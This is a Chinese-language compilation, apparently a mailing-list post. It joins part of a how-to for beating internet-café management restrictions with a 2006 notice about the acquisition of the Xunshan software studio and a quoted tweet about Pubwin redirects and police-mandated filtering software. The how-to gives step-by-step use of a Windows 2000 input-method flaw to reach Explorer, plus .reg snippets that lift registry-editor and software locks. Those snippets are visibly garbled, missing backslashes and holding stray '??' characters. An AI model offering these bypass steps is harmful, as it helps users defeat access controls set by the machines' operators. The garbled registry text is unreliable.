  如果需要用IE下载时,你只需要点击“工具”→“Internet
选项”→“安全”→“默认级别”菜单。然后在需要下载的链接上单击鼠标右键,
选择“目标另存为”保存即可。或者选择“安全”→“自定义级别”里选择“下载”,选择“启用”,“确定”后即可
七、文件操作漏洞
  删除文件 简单
  这是一个注重隐私的时代,我的银行卡密码被别人知道了岂不是大大不妙,
所以很多时候,在网吧上网,删除自己留在网吧电脑里的私人文件是很重要的,
但网吧都安装了管理软件,所以很难进行这样的操作,别急,下面有一种方法让你办到,
这样你就不会担心自己的隐私被别人发现啦。
  探秘欲望度:★★★★☆
  探秘难度:★★★☆☆
  探秘方法:利用输入法漏洞,输入法漏洞不是中文Win2000的漏洞吗?没错!
就是利用这个方法来打开硬盘进行操作哦。方法很简单:按“Ctrl+Shift”打开微软拼音输入法
??如没有用其它输入法也可,方法类似,然后将光标插入会员卡号的文本输入框内,
接着开始往里面输入任意一个拼音字母,然后就会出现拼音的状态条,在状态条上点击右键,
或用键盘上的属性键,就会出现一个下拉菜单,选择其中的定义词组,就算系统限制右键,
在这也不管用,然后选择文件菜单里面的保存,就会调出保存对话框,
然后随便选择一个文件夹,点击右键,选择资源管理器,打开,一切就OK啦!
现在你就可以删除自己的隐私文件了。如果鼠标被限定在那个锁定窗口内,
就用键盘操作。此法百试百灵,而且现在没有防御的方法。
  八、注册表漏洞
  封锁注册表 很难
  那些喜欢玩电脑的高手,总是希望能过修改注册表来实现一些深层次的应用,
希望能如自己在家一样有那种自由冲浪的感觉,此情咱们也是强烈渴望的,
那么如何可以突破网管软件的限制,成功修改注册表?
  探秘欲望度:★★★★☆
  探秘难度:★★★★☆
  探秘方法:由于网管软件在许多功能上的禁止使用(包括禁止使用注册表编辑器)
是通过对注册表的修改来达到目的的,因此我们只要将注册表修改回来,就能取消网关的限制。
这里我们用导入的方法进行修改。先打开一个记事本,在上面输入
REGEDIT4
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem??
″DisableRegistryTool″=dword??00000000
  这个与第三个漏洞中所输入的是类似的,同样地保存为“.reg”文件或
保存为“.txt”文件后将扩展名改为“.reg”,再双击执行该文件即可。
九、禁用软件漏洞
  恢复“WinZip”本色 好办
  有些网吧连“WinZip”这种压缩工具软件都不能使用,那辛辛苦苦从网上拖个
需要解压的程序下来,岂不是又浪费银子又浪费时间。不过话虽如此,网吧也有他们的难处,
有些不守规矩的网民就喜欢用点这些软件,来搞搞破坏什么的,用它们来改改注册表什么的,
而且是乱改,不像我,改注册表只是为了使“WinZip”能使用,嗯,好的,
下面这种方法就是如何通过改注册表来使用“WinZip”。
  探秘欲望度:★★★☆☆
  探秘难度:★★★★☆
  探秘方法:我们这次要做的当然还是利用IE与系统结合的漏洞,在IE地址栏中用
中文输入“桌面”回车。如此一来我们熟悉的桌面又以窗口的形式打开啦,
现在我们要做的和上面要做的一样:新建一个文本文档,然后输入这么一行:
REGEDIT4
HKEY_LOCAL_MACHINESoftwareMpsoftSmenu??
″unzipped″=dword??00000000
  然后保存为.reg文件或保存为.txt文件后,将扩展名改为.reg,在执行该文件就一切搞定。
  十、定制IE浏览器漏洞
  定制IE浏览器 随心
  在网吧上网,总喜欢个性一点,比如开启新的IE就会自动连接到自己最喜欢的网站上,
或者关掉网页的“声音”和“动画”,让浏览更加流畅。可是这个必须到“工具”
栏里“Interner选项”里设置,而这个选项往往是被屏蔽了的。其实把选项变回来也是很简单的。
  探秘欲望度:★★★☆☆
  探秘难度:★★★☆☆
  探秘方法:在前面我们已经能够访问硬盘了,所以此时只需要到系统“System”目录下
将名为“Inetcpl”的文件扩展名改为“.cpl”,这时“工具”栏里“Internet选项”便出来了。
非常简单哦。这样,我们就可以设置我们喜欢的IE了。

http://blog.sina.com.cn/s/blog_4c31c795010008mh.html
上海新浩艺软件有限公司并购了迅闪工作室(2007-03-28 10:01:07)
2006-09-26 10:47

这是Pubwin官方网站的公告:
感谢您长期以来对“迅闪”的支持!为了能给您提供更加完善产品及更好的服务,现公告:原《迅闪游戏更新系统》现正式属于上海新浩艺软件有限公司所有。我 (Freespace8)也将在新浩艺继续负责迅闪系列产品的研发。迅闪产品仍将坚持易用、高性能的特性,加上强大的研发团队、技术团队和服务团队将提供 给您更完美的更新产品和更周全的服务。
而且《迅闪标准版》也已开始免费。
迅闪包括以下系列产品:
《迅闪标准版》:即原《迅闪游戏更新系统》,现在开始免费。
《迅闪网络还原》:防破解、支持多还原点、类似冰点集中管理等功能,此产品将免费。
《迅闪游戏专家》:将集成Linux虚拟磁盘功能(支持群集)、开机更新、组播等功能。
《迅闪网络还原》和《迅闪游戏专家》计划将在今年10月份与大家见面。10月份的《迅闪标准版》和《迅闪游戏专家》将与还原做到完美的无缝结合,同时将附 有付费的三层更新服务。

商务咨询热线:8621-51077788*638
技术支持热线:8621-51077788*1
迅闪产品主页:http://www.hintsoft.com.cn/xs.html
迅闪技术支持论坛:http://www.pubwin.com.cn/bbs/forumdisplay.php?fid=6
迅闪标准版V4.92相关下载:http://www.hintsoft.com.cn/download.jsp


wanghx

unread,
Jun 1, 2009, 9:00:36 AM6/1/09
to lih...@googlegroups.com
http://twitter.com/Ye1980s/statuses/1990866081
Ye1980s: @xiahua 有时访问某些网站的确会被转向,网址也会变,里面会多出+
pubwin字符。不过更应小心的是网吧里的净网先锋,公安部强制安装的。用360保
险箱早期版本能够阻止这两个软件和木马的不良访问意图。


Reply all
Reply to author
Forward
0 new messages